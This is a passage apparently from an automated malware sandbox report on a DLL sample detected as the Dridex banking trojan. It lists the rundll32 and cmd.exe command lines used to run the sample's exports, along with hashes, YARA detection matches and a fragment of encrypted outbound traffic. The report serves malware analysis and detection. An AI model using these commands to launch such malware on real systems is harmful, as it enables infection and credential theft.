                                                                                                      2021-10-28 02:53:29 UTC44OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:30 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:04:52:06
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll'
                                                                                                      Imagebase:0xc50000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.815049595.000000006E931000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.413004072.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      General

                                                                                                      Start time:04:52:07
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                                                                                                      Imagebase:0xd80000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:52:07
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Bluewing
                                                                                                      Imagebase:0x990000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000003.380770170.00000000007C0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:52:07
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                                                                                                      Imagebase:0x990000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000002.816097382.000000006E931000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000003.381345345.00000000031A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:52:11
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Earth
                                                                                                      Imagebase:0x990000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000003.400629828.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:04:52:18
                                                                                                      Start date:28/10/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Masterjust
                                                                                                      Imagebase:0x990000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000009.00000003.411045678.00000000046D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >